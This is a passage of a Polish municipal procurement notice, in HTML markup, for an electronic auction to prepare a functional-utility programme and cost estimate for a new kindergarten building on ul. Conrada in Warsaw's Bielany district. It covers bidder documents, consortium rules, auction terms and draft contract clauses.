DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">Zamawiający nie będzie wzywał do złożenia dokumentów w celu potwierdzenia okoliczności, októrych mowa w art.25 ust.1 pkt 3 ustawy PZP.</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">Zamawiający nie będzie wzywał do złożenia dokumentów w celu potwierdzenia okoliczności, októrych mowa w art.25 ust.1 pkt 1 ustawy PZP.</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji">Nie dotyczy</span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci">Nie dotyczy</span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">1. Formularz wniosku o dopuszczenie do udziału w licytacji o treści zgodnej ze wzoremstanowiącym zał. Nr 2 do Ogłoszenia. 2. Inne dokumenty wymagane w postępowaniu: a)Jeżeliwniosek, w tym wszelkie oświadczenia i dokumenty zostały podpisane przez osobę/by działającena podstawie pełnomocnictwa, do wniosku należy dołączyć właściwe pełnomocnictwo w formieoryginału lub kopii poświadczonej za zgodność z oryginałem przez notariusza. W przypadku niedopełnienia powyższego, po wyczerpaniu drogi wynikającej z art.26 ust.3a ustawy Prawozamówień publicznych, powyższe będzie skutkowało nie dopuszczeniem Wykonawcy do udziału wlicytacji elektronicznej. Poprzez analogię, jeżeli osobą uprawnioną do składania ofert w imieniuWykonawcy w trakcie trwania licytacji elektronicznej będzie osoba działająca na podstawiepełnomocnictwa, albo inna osoba niż podpisująca wniosek (np. tylko jeden członek zarządu wprzypadku wieloosobowej reprezentacji), należy dołączyć do wniosku albo najpóźniej na dzień przed dniem, w którym ma zostać przeprowadzona licytacja należy złożyć - pełnomocnictwopodpisane przez osobę/osoby uprawnioną/e do reprezentacji Wykonawcy, w formie oryginału lubkopii poświadczonej za zgodność z oryginałem przez notariusza, z którego wynikać będzie prawodo składania ofert w trakcie licytacji elektronicznej. W przypadku nie dopełnienia powyższego, tj.w sytuacji gdy najpóźniej na dzień przed dniem, w którym ma zostać przeprowadzona licytacja,nie zostanie złożone pełnomocnictwo, o którym mowa powyżej, Wykonawca nie zostaniedopuszczony do udziału w licytacji elektronicznej. b)Pełnomocnictwo do reprezentowania wpostępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówieniapublicznego, w przypadku gdy wykonawcy wspólnie ubiegają się o udzielenie zamówienia(oryginał lub notarialnie poświadczona kopia). W przypadku nie dopełnienia powyższego, powyczerpaniu drogi wynikającej z art.26 ust.3a ustawy Prawo zamówień publicznych, powyższebędzie skutkowało nie dopuszczeniem Wykonawców do udziału w licytacji elektronicznej. c)Downiosku o dopuszczenie do udziału w licytacji należy załączyć dokument/y potwierdzający/e, żeosoba podpisująca wniosek i inne dokumenty lub oświadczenia lub udzielająca pełnomocnictwa -jest umocowana do reprezentowania Wykonawcy (w odniesieniu do pełnomocnictwa - byłaupoważniona do reprezentowania Wykonawcy w dacie udzielenia pełnomocnictwa), chyba żeumocowanie wynika z dokumentu/ów dostępnego/ych dla Zamawiającego w myśl art.26 ust.6ustawy Pzp. d) W przypadku gdy Wykonawca przy wykazywaniu warunków udziału wpostępowaniu polega na zdolnościach lub sytuacji innych podmiotów na zasadach określonych wart. 22a ust.1 ustawy PZP, zobowiązany jest udowodnić zamawiającemu, iż będzie dysponowałzasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celuzobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzebyrealizacji zamówienia. Udowodnienie, o którym mowa powyżej powinno obejmować nie tylkowskazanie faktu udostępnienia określonych wykonawcy zasobów przez podmiot trzeci, ale winnowyrażać w sposób wyraźny i jednoznaczny wolę udzielenia, wskazywać jego rodzaj, czasudzielenia a także inne istotne okoliczności, w tym wynikające ze specyfiki tego zasobu. Wprzypadku nie udowodnienia we wniosku, w wystarczający sposób dysponowania zasobamipodmiotu trzeciego, niezbędnymi dla należytego wykonania zamówienia oraz oceny, czy stosunekłączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do tych zasobów, w trakciebadania dokumentów złożonych w toku postępowania o udzielenie zamówienia publicznego,zamawiający wezwie wykonawcę do przedstawienia zamawiającemu dokumentów, dotyczących wszczególności: 1) zakresu dostępnych wykonawcy zasobów innego podmiotu, 2) sposobu wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia, 3)zakresu i okresu udziału innego podmiotu w wykonywaniu zamówienia. Uwaga! Informację opodmiotach na zdolnościach lub sytuacji, których Wykonawca polega, na zasadach określonych wart.22a ust.1 ustawy PZP należy zawrzeć w oświadczeniach, o których mowa w sekcji III - pkt 3)Ogłoszenia. Przykładowy wzór zobowiązania w zakresie określonego warunku udziału wpostępowaniu, tj. zdolności technicznej - stanowi załącznik nr 5 do Ogłoszenia. 3. Zasadywspólnego ubiegania się o udzielenie zamówienia przez wykonawców, o których mowa w art. 23ustawy Pzp: 1) Wykonawcy, którzy wspólnie ubiegają się o udzielenie zamówienia mogą łączniespełniać warunki o których mowa w art. 22 ust. 1 pkt 2ustawy Pzp. 2) Wykonawcy występującywspólnie (np. spółki cywilne, konsorcja) są zobowiązani do ustanowienia Pełnomocnika doreprezentowania ich (tj. konsorcjum) w postępowaniu albo do reprezentowania ich (tj.konsorcjum) w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówieniapublicznego. Oryginał pełnomocnictwa lub kopii poświadczonej notarialnie powinien być załączonydo wniosku i zawierać w szczególności wskazania: - postępowania o zamówienie publiczne,którego dotyczy; - wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówieniawymienionych z nazwy z określeniem adresu siedziby; - ustanowionego Pełnomocnika orazzakresu jego umocowania. 3) W przypadku złożenia wspólnego wniosku, w formularzu wnioskupełnomocnik zaznacza w czyim imieniu występuje. 4) Wszelka korespondencja oraz rozliczeniadokonywane będą wyłącznie z pełnomocnikiem. 5) Żaden z Wykonawców składających wspólniewniosek, nie może podlegać wykluczeniu z powodu niespełnienia warunków, o których mowa wart. 24 ust.1 ustawy Pzp. (oświadczenie o niepodleganiu wykluczeniu, o którym mowa w sekcji III- pkt 3) Ogłoszenia składają wszyscy Wykonawcy składający wspólny wniosek). 6)Oświadczenie ospełnianiu warunków udziału w postępowaniu, o którym mowa w sekcji III - pkt 3) Ogłoszenia -Wykonawcy wspólnie ubiegający się o udzielnie zamówienia składają wspólnie (tj. oświadczeniema zostać podpisane przez wszystkich Wykonawców, bądź umocowanego PełnomocnikaWykonawców), potwierdzając iż określone warunki spełniają razem. 4. Mając na uwadze brzmienieart.24 ust.1 pkt 23) ustawy PZP, odnosząc się równocześnie do brzmienia art.26 ust.2f ustawy PZP- Zamawiający informuje, iż wraz z zaproszeniem do składania ofert, skierowanym doWykonawców spełniających warunki udziału w postępowaniu, wezwie ich wszystkich, do: złożeniaoświadczenia o przynależności lub braku przynależności do tej samej grupy kapitałowej, o którejmowa w art.24 ust.1 pkt 23) ustawy PZP (stanowiącego załącznik nr 6 do Ogłoszenia).Oświadczenie to nie jest wymagane na etapie składania wniosków o dopuszczenie do udziału w licytacji elektronicznej. 5.Wykonawca zagraniczny składa dokumenty zgodne z zapisami sekcji IIIpkt3) oraz 7) Ogłoszenia, ze szczególnym uwzględnieniem, aby dokumenty złożone z wnioskiempotwierdzały, iż wniosek został podpisany przez osobę/y uprawnioną/e do reprezentowaniaWykonawcy.</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Licytacja elektroniczna</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej">Nie</span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow">Nie</span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna"></span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani">Nie</span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>100</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Nie</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu">Nie</span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6">http://aukcje.um.warszawa.pl</span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7">http://www.bielany.waw.pl</span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8">1. Wykonawca, pobiera ze wskazanej w ogłoszeniu o przedmiotowej licytacji strony internetowejhttp://www.bielany.waw.pl wzór wniosku wraz z załącznikami. Następnie, w przypadkuzainteresowania udziałem w licytacji elektronicznej, składa wniosek o dopuszczenie do udziału wpostępowaniu. Złożenie wniosku jednocześnie oznacza akceptację warunków licytacji ipostanowień umowy. Zamawiający, po weryfikacji nadesłanych wniosków, informuje Wykonawcówo wyniku kwalifikacji oraz zaprasza do składania ofert (postąpień) wszystkich Wykonawcówspełniających warunki udziału w postępowaniu. Treść zaproszenia zawierać będzie adres stronyinternetowej, na której odbywać się będzie licytacja oraz parametry licytacji elektronicznej (data,godzina otwarcia, czas trwania i warunki zamknięcia licytacji). Następnie za pośrednictwemoperatora platformy aukcyjnej do zakwalifikowanych do udziału w licytacji Wykonawców (na adrese-mail osoby wskazanej we wniosku o dopuszczenie do udziału w postępowaniu) zostanie wysłanawiadomość wraz z instrukcją obsługi platformy aukcyjnej. Kody dostępu do platformy aukcyjnej:1) Operator platformy aukcyjnej przekazuje zakwalifikowanym przez Zamawiającego Wykonawcominformację o sposobie rejestracji na platformie aukcyjnej. W trakcie rejestracji Wykonawcaotrzyma kod dostępu do platformy aukcyjnej. Otrzymany kod dostępu do platformy aukcyjnejWykonawca będzie musiał zmienić na nowy - określony przez siebie. 2) O ewentualnychproblemach z rejestracją należy niezwłocznie powiadomić osobę upoważnioną do kontaktu zWykonawcami, której dane kontaktowe przekazane zostaną w zaproszeniu do składania ofert wlicytacji elektrycznej. W dalszej kolejności, w terminie wyznaczonym w treści wiadomości, dlaWykonawców zaproszonych do udziału w licytacji elektronicznej zostanie zdefiniowana licytacjatestowa. W trakcie licytacji testowej, dla zainteresowanych Wykonawców, operator platformyprzeprowadzi telefonicznie szkolenie dotyczące zasad korzystania z platformy aukcyjnej, w czasiektórego zostaną omówione zasady postępowania w trakcie licytacji elektronicznej. 2. Komputerużytkownika powinien spełniać następujące wymagania: posiadać zainstalowany systemoperacyjny wspierany przez producenta tego systemu (Windows 7/Windows 8/Windows 10 bądźnowszy); być wyposażony w procesor taktowany zegarem o częstotliwości 1 GHz i posiadać conajmniej 1 GB pamięci RAM (są to wymagania jakie powinien spełnić komputer z systemem Windows 7); posiadać zainstalowaną przeglądarkę internetową wspieraną przez jej producenta:Microsoft Internet Explorer w wersji co najmniej IE10 albo Mozilla Firefox; posiadać połączenie zsiecią Internet o przepustowości nie mniejszej niż 128 kb/s. 3. Od momentu otwarcia do momentuzamknięcia licytacji, zgodnie z art.77 ustawy Pzp, Zamawiający i Wykonawcy przekazują wnioski,oświadczenie i inne informacje drogą elektroniczną, za pomocą platformy, na której prowadzonajest licytacja.</span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9">1. W trakcie licytacji Wykonawca podaje ryczałtową cenę brutto (z VAT) za zakres określony wsekcji II - 4) oraz wzorze umowy zawartym sekcji IV - pkt 4) Ogłoszenia (stanowiącymrównocześnie załącznik nr 1 do Ogłoszenia). Wynagrodzenie ryczałtowe, jest to niezmiennewynagrodzenie Wykonawcy obejmujące wszystkie świadczenia konieczne do terminowegowykonania przedmiotu umowy. Wykonawca przy tak przyjętym wynagrodzeniu nie może żądaćjego podwyższenia nawet, gdyby okazało się podczas realizacji, że są konieczne do wykonaniaprzedmiotu umowy i osiągnięcia celów w niej określonych, prace towarzyszące, które nie wynikająwyraźnie z opisu i postanowień umownych. Przyjmuje się, że za prawidłowo wyliczoną cenęryczałtową za cały przedmiot zamówienia odpowiada Wykonawca, bez względu na sposób jejobliczenia. 2. W toku licytacji elektronicznej Zamawiający na bieżąco przekazuje wszystkimWykonawcom informacje o pozycji składanych przez nich ofert, liczbie Wykonawców biorącychudział w licytacji, a także o cenach złożonych przez nich ofert, z tym, że do momentu zamknięcialicytacji elektronicznej nie ujawnia informacji umożliwiających identyfikację Wykonawców. 3.Zamawiający przewiduje otwarcie licytacji elektronicznej w dniu 07.06.2017 r. o godz.10:00.Ostateczny termin licytacji Zamawiający poda w zaproszeniu do udziału w licytacji elektronicznej.Zamawiający ustala czas trwania licytacji na 15 minut. Zamawiający zamyka licytację, gdy wpodstawowym czasie nie zostanie złożona żadna oferta lub gdy w ciągu 3 minut od złożenia ofertyprzez jednego z Wykonawców nie zostanie złożona żadna inna oferta, jednakże nie wcześniej niżpo upływie 15 minut od otwarcia licytacji. Zamawiający zastrzega sobie prawo do zmianpowyższych parametrów licytacji. O zmianach zostaną niezwłocznie poinformowanie wszyscyzaproszeni Wykonawcy. 4. Za ofertę najkorzystniejszą zostanie uznana oferta, która zawieraćbędzie w chwili zamknięcia licytacji elektronicznej, najniższą ryczałtową cenę brutto za realizacjęcałego zamówienia. 5. Zapłata nastąpi zgodnie z warunkami umowy - wzór umowy zamieszczonyzostał w pkt IV.4) Ogłoszenia (stanowiącej równocześnie załącznik nr 1 do Ogłoszenia). 6. Zamawiający dopuszcza prowadzenie rozliczeń z Wykonawcą jedynie w walucie polskiej.Dodatkowo nadmienia się, iż składanie ofert (postąpień) w licytacji elektronicznej musi być takżewyrażone w walucie polskiej. Ryzykiem konieczności wykonania wszelkich prac towarzyszących,mogących pojawić się w trakcie realizacji zamówienia, ryzykiem związanym ze zmianą stawkipodatku VAT, zmianami kursów walut, ceł itp., obciąża się Wykonawcę a Wykonawca winien jeuwzględnić w składanej w trakcie licytacji ofercie (postąpieniu). 7. Minimalna wysokość postąpień -500,00 zł 8. Cena wywoławcza: 42 779,74 Zł</span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa">licytacja jednoetapowa</span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas">15 minut</span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani">Nie</span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data">2017-05-29 </span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"> 10:00:00</span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12">07.06.2017 r.</span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13">Zamawiający przewiduje otwarcie licytacji elektronicznej w dniu 07.06.2017 roku godzina 10:00. Zamawiający przewiduje zamknięcie licytacji elektronicznej w dniu 07.06.2017 roku o godzinie 10:15, dodatkowe informacje zawarte zostały w punkcie odnoszącym się do sposobu postępowania w licytacji elektronicznej. </span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia">§ 1.Przedmiot umowy1.	Zamawiający powierza, a Wykonawca przyjmuje do realizacji opracowanie Programu Funkcjonalno - Użytkowego z wyliczeniem Planowanych kosztów robót budowlanych i prac projektowych, w ramach zadania inwestycyjnego pn. : ,,Budowa nowego budynku Przedszkola nr 327 ul. Conrada 10a".2.	Opis przedmiotu umowy stanowi załącznik nr 1.3.	Zawartość programu funkcjonalno-użytkowego ma być w pełni zgodna z Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz.U. z 2013 r. poz. 1129 z późn. zm.) a planowane koszty w pełni zgodnez Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U. z 2004 poz. 1389).4.	Wykonawca przekaże Zamawiającemu przedmiot umowy w 4 egz. w formie papierowej i 1 egz. w formie elektronicznej, z zastrzeżeniem iż dokumentację w wersji elektronicznej należy sporządzić: część opisowa (w tym STWIOR) w programie z pakietu MS OFFICE oraz w formacie PDF, rysunki - w formacie PDF oraz DWG, planowane koszty - w formacie PDF oraz plikach z rozszerzeniem ATH lub w programie MS OFFICE. § 2.Termin realizacjiTermin realizacji przedmiotu umowy - od dnia zawarcia umowy do dnia 15.07. 2017 r. § 3.Wynagrodzenie1.	Zamawiający zapłaci Wykonawcy za wykonany przedmiot umowy wynagrodzenie ryczałtowe brutto (obejmujące podatek VAT zgodnie z ustawą z dnia 11 marca 2004 r. o podatku od towarów i usług) w wysokości: .................. zł. (słownie: ............. złotych.2.	Wynagrodzenie ryczałtowe, o którym mowa w ust. 1, jest to niezmienne wynagrodzenie Wykonawcy obejmujące wszystkie świadczenia konieczne do terminowego wykonania przedmiotu umowy zgodnie z ofertą Wykonawcy i obowiązującymi przepisami. Wykonawca przy tak przyjętym wynagrodzeniu nie może żądać jego podwyższenia nawet, gdyby okazało się podczas realizacji, że prace towarzyszące, niewynikające wyraźnie z opisu robót, innych postanowień umownych, są konieczne do wykonania przedmiotu umowy i osiągnięcia celów w niej określonych.3.	Wynagrodzenie o którym mowa w ust. 1 uwzględnia wszystkie koszty związane z realizacją umowy. 4.	Prace będące przedmiotem umowy będą rozliczone 